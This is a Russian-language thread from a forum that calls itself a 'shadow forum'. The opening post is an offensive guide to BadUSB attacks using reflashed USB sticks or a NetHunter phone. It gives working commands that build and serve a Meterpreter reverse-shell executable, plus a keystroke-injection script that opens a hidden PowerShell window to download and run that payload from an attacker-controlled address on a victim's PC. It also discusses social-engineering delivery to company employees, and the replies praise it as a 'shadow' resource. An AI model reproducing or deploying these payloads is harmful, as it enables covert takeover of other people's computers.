• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

yarr

CVE-2020

yarr

CVE-2020
Резидент
Сообщения
268
Реакции
444
0 руб.
Общая информация.

Сегодня я расскажу Вам об одном интересном классе атак, который называется BadUSB. Известен он давно, с 2011 года точно, а то и ранее, но широкую огласку получил в основном в 2014-2015 годах. BadUSB пользуется тем, что не все производители защищают свои устройства от перепрошивки, а хосты не проверяют USB устройства на подлинность. От платформы реализации атака зависит мало. Благодаря этому мы можем подменить прошивку микроконтроллера и выдать одно устройство за другое. Классический пример - это когда флешка или другой девайс притворяется клавиатурой, при подключении открывает cmd и заливает Reverse Shell, причем все происходит за секунды. Так же флешка может притворяться сетевой картой, провести Boot Injection и теоритически заражать новые устройства.

Phison-2303.png


Мануал предназначен для продвинутых пользователей, интересующихся мобильным пентестом и установкой кастомных прошивок. Это означает, что некоторые очевидные моменты я буду опускать. Cайты на которых есть подробности - 4pda, xda-developers, kali.org.

Ссылки в рамках данного мануала не являются рекламой.


Вообще полноценной уязвимостью все это дело назвать сложно, ведь были и будут всякие хитрые устройства, замаскированные под переходник для клавиатуры, зарядку для ноутбука, а на деле отправляющие данные пользователя в неизвестном направлении и т.д., или изделия от Hak5shop (USB Rubber Ducky, Bash Banny, и проч., справедливости ради отмечу, что это немного другой, более сложный подкласс атак - т.н. "Rubber Ducky", там можно использовать не только простенький скриптовый язык, но и классические мощные ЯП). Основное отличие BadUSB от этих штуковин в том, что мы берем железо, не предназначенное для шпионской деятельности, вроде обычной флешки и записываем в его контроллер вредоносный код, то есть все манипуляции происходят на уровне firmware, специальные девайсы не нужны.

Та же утка стоит около 50 баксов,
maxresdefault.jpg
а еще надо заплатить
http://shopotam.ru/brand/hak5/ за доставку (+ 15 баксов) и т.д. Имеем бюджет для покупки в 4000 - 4500 тыс. рублей за спец. устройство. Много. Потом, если нужно применить СИ и впарить эту флешку сотруднику целевой компании надеяться на ее возврат глупо. А это -4000 из Вашего бюджета. Кстати может и не сработать, так как выполнение кода сильно привязано к конкретному состоянию целевого ПК на момент заражения (раскладка клавиатуры не та, что-то подвисло, не успели встать драйвера, и все).
Значит, нужно искать что-то дешевле. Вот тут как раз мы смотрим в сторону тех производителей, которые не защитили свои девайсы от перезаписи прошивки (я например в 2014 нашел у себя флешку с Phison 2251-03 и на нее заливал payloads) или на aliexpress, ebay за 3 бакса купить (там таких устройств много).


ЛК разработала модуль, нацеленный на авторизацию клавиатур в системе, но он доступен только в корпоративной версии, и широкое распространение не получил. Естественно можно просто блокировать порты от неавторизованных устройств и т.д., но это не удобно для большинства пользователей
(https://www.kaspersky.ru/blog/badusb-solved/12425/).

В этой статье я приведу свой личный опыт, и не буду рассматривать всякую теоритическую хрень, вроде этой: "Некоторые вирусы изменяют встроенное программное обеспечение USB-устройств так, чтобы операционная система определяла USB-устройство как клавиатуру". Вирусы в рамках этой статьи мы писать не будем. Это все на уровне какой-нибудь Equation Group, которая промышляет APT-атаками на конкретный модели HDD, засирая их firmware шпионским ПО под завязку так, что потом только в помойку. Немного информации по теме - https://www.kaspersky.ru/blog/hardware-malware/7364/. Конечно я преувеличил, но все же такой бюджет есть только у гос. структур. Вряд ли среднестатистический пентестер способен написать такую малварь, которая модифицирует firmware некоторых контроллеров HDD/flash drive, а потом еще и заражает через ПК другие флешки, создает на них скрытые разделы, пишет туда конфиденциальные файлы, передавая их потом в сеть. Реализовать под конкретный ПК реально, были бы ресурсы, вопрос только в том, что пишется такая дичь в основном для целевой атаки, а значит на любом другом ПК может и не сработать.

В целях экспериментов имеет смысл использовать для реализации атаки купленные на ali девайсы, или любое Android-тело с установленным NetHunter (либо если есть оба устройства, использовать NetHunter для отладки кода, ведь процесс презаписи payload в контроллер флешки дольше, и может превратить ее в маленький кирпичик).
Простое применение данной атаки на практике, это когда Вы имеете такое устройство с заранее заряженными в обойму командами cmd/shell, а время доступа к ПК, в течении которого Вас не заметят, пару десятков секунд, а то и меньше.
Допустим надо получить удаленный доступ к цели, а времени в обрез. Записали payload в NetHunter/флешку заранее, в нужное время подключили к ПК жертвы, нажали кнопку. Посложнее реализовать варианты "подарок" или "интересная находка" - они связаны с СИ.


Ищем подходящее устройство.

1. USB Rubber Ducky(https://hakshop.com/collections/usb-rubber-ducky/products/usb-rubber-ducky-deluxe)
2. платформа Arduino (https://geektimes.ru/post/294271/)
3. флешка с Phison 2251-03
4. Teenzy (https://habrahabr.ru/post/153571/)

5. какая-нибудь еще хрень с ali
6. Android с NetHunter на борту

Скажу сразу, что лично я использовал варианты №3 и 6 (они различаюся только аппаратной реализацией, по части payload разницы нету). Соответственно и расскажу подробнее про них. Еще один важный момент - параметры железа влияют на скорость обработки команд, перед покупкой спец. девайса ознакомьтесь с софтом для него (выложен в основном на github).

Подготовка устройства.

Тут зависит от выбранного варианта.

- В случае с флешкой нам нужно перейти по ссылке из 3 пункта, там автор все в мельчайших подробностях расписал, а под видео есть все нужные файлы, так что делать дубликат не буду.

- Во 2 случае все проще - NetHunter из коробки умеет проводить HID Attacks, DuckHunter HID, BadUSB MITM. Открываем NetHunter.apk, пишем код в окно со вкладкой DuckHunter HID (или выбираем из дефолтных вариантов для теста), соединяем девайс с ПК в режиме "зарядка через USB" и нажимаем кнопку. Добро пошло. Кстати присутствует поддержка нескольких раскладок клавиатуры, но я использую ту, которая по умолчанию. При желании можно подробно изучить возможности NetHunter в этом направлении.


Пишем payload.

На этом сайте https://ducktoolkit.com/ есть генератор, а также готовые варианты полезной нагрузки. Так же для продвинутой работы с сабжем желательно уметь работать с PowerShell, cmd, и одним из популярных ЯП.

По ссылке выше готовые скрипты могут неправильно работать, нужно исправить кое-какие ошибки в коде и адаптировать под целевую версию Windows.


Синтаксис для скриптов есть в открытом доступе
Код зависит от вашей цели и навыков программирования (может быть использован в 2 основных направлениях - атака с зараженной флешкой + элементы СИ, и просто как быстродоступные скрипты для заражения ПК, к которому появился доступ)

Простой пример.

В качестве примера я рассмотрю простой вариант с Reverse Shell, последнее время он может детектироваться AV, и нуждается в модификации, так что будет рассмотрен в учебных целях. Способ, который я покажу, с некоторой корректировкой можно применить и для обратной связи из WWW, как на схеме ниже.
iv4hZCaWIHf15rqk-tx-q7tG1QJ1WffamZYkDM-zjZhuSiP05RNTPu8vOtON7E32al0KN4-v0L86ol-HmF9foQ%3D%3D
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=(юзаем ifconfig) PORT=4444 -f exe > shell.exe
идем в /var/www/html и копируем shell.exe в эту папку
# msfconsole
# use/exploit/multi/handler
# set payload windows/meterpreter/reverse_tcp
# set LHOST (ваше значение)
# set LPORT 4444
# set ExitOnSession false
# exploit -j -z
Для доставики кода на целевой ПК используем нашу флешку/смартфон
DELAY 2000
GUI r
DELAY 1000
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('
http://192.168.1.45/shell.exe','%TEMP%\shell.exe'); Start-Process "%TEMP%\shell.exe"
DELAY 1500
ENTER
Затем заливаем код на наше устройство, отлаживаем (играем с Delay, 1000, 1500 миллисекунд и т.д.) и доставляем на ПК жертве.

P.S. Ввиду достаточного количества фото/видео материалов по данной теме(в основном на английском и др. иностранных языках) снимать свое видео/добавлять скриншоты не буду, все отлично гуглится. Кейсом занимаюсь лично сам, если есть вопросы пишите в личку/тему.

P.P.S. Тема достаточно объемная, поэтому уместить в 1 посте не получилось, как будет время запилю несколько примеров атаки.
 
Последнее редактирование:

meksikanec86

Новичок
Сообщения
6
Реакции
0
0 руб.
Статья очень любопытная. Конечно хотелось бы пример на основе флешки, которую жертва сама подключит к компу, а доступ к машине получался бы из глобала.
 

M1Rz

Новостной куратор

M1Rz

Новостной куратор
Куратор
Сообщения
407
Реакции
251
10 руб.
Telegram
А тем временем яр как всегда радует,хорошими статьями и мануалами без всякой скучной теории и воды))
 

yarr

CVE-2020

yarr

CVE-2020
Резидент
Сообщения
268
Реакции
444
0 руб.
Статья очень любопытная. Конечно хотелось бы пример на основе флешки, которую жертва сама подключит к компу, а доступ к машине получался бы из глобала.
Позже планирую 2 часть с конкретными рабочими примерами. То, что есть в сети быстро устаревает и палится AV или не работает должным образом. Такие темы надо самому, руками, до ума доводить. Проверено на личном опыте. Год назад писал простенькие Ducky скрипты, 1 из них крашил систему, потом детектироваться правда стал.
 

yarr

CVE-2020

yarr

CVE-2020
Резидент
Сообщения
268
Реакции
444
0 руб.
На мой взгляд, по соотношению цена цена, лучше использовать какую-нибудь фигню с али.
Да, там за последнее время появилось много подобных устройств, их и не жалко в случае чего. Параметры железа, кстати, тоже некоторую роль играют - скажется на скорости обработки команд, также при покупке надо ознакомится с репозиториями на github для покупаемого девайса, продавцы часто их в описании указывают.
 
Последнее редактирование:

yarr

CVE-2020

yarr

CVE-2020
Резидент
Сообщения
268
Реакции
444
0 руб.
UPD. Вспомнил про конкурс. Ув. @Night просьба выдать VC.
 

danaforevr

питонист

danaforevr

питонист
Резидент
Сообщения
269
Реакции
516
0 руб.
Часть 1. Будет ли 2 часть?
________________________
Сори,не заметил выше аналогичный вопрос
 

yarr

CVE-2020

yarr

CVE-2020
Резидент
Сообщения
268
Реакции
444
0 руб.

normaner

Местный
Сообщения
65
Реакции
51
0 руб.
кто знает киньте сылки с алика на хунюшки эти
 

yarr

CVE-2020

yarr

CVE-2020
Резидент
Сообщения
268
Реакции
444
0 руб.

yarr

CVE-2020

yarr

CVE-2020
Резидент
Сообщения
268
Реакции
444
0 руб.
кто знает киньте сылки с алика на хунюшки эти
ВАЖНО для всех:
Перед покупкой Вы должны понимать, что покупаете, и для чего. Иначе купите устройство, и будет у Вас оно лежать. Изучите перед покупкой общую информацию, PowerShell, базовый синтаксис cmd, особенности компиляции кода для устройства, которое хотите купить.
 
Последнее редактирование:

yarr

CVE-2020

yarr

CVE-2020
Резидент
Сообщения
268
Реакции
444
0 руб.
Я использовал смартфон с NetHunter и обычную флешку. Для них информации достаточно, и порог входа небольшой. Для работы с другими девайсами советую изучить их работу.
 

Diger

Новичок
Сообщения
5
Реакции
0
0 руб.
народ извените, не по теме. подскажите моет на форуме тема есть подобная, перелопатил инет в поисках как установить netHanter на
xiaomi redmi redmi nod 3
 

M1Rz

Новостной куратор

M1Rz

Новостной куратор
Куратор
Сообщения
407
Реакции
251
10 руб.
Telegram

M1Rz

Новостной куратор

M1Rz

Новостной куратор
Куратор
Сообщения
407
Реакции
251
10 руб.
Telegram
На 4pda ройся
 

Alinchok

Занятой человек

Alinchok

Занятой человек
Эксперт
Сообщения
325
Реакции
904
0 руб.
Please note, if you want to make a deal with this user, that it is blocked.
ВОТ! Вот о чем я говорил... именно этим влми и лучший!
Не надо думать что такие статьи не нужны и лучше написать как срубить 20 руб, за регу... Такие статьи и есть ядро теневого форума.
Автору однозначно респект и заслуженный лайк!
 
Сверху Снизу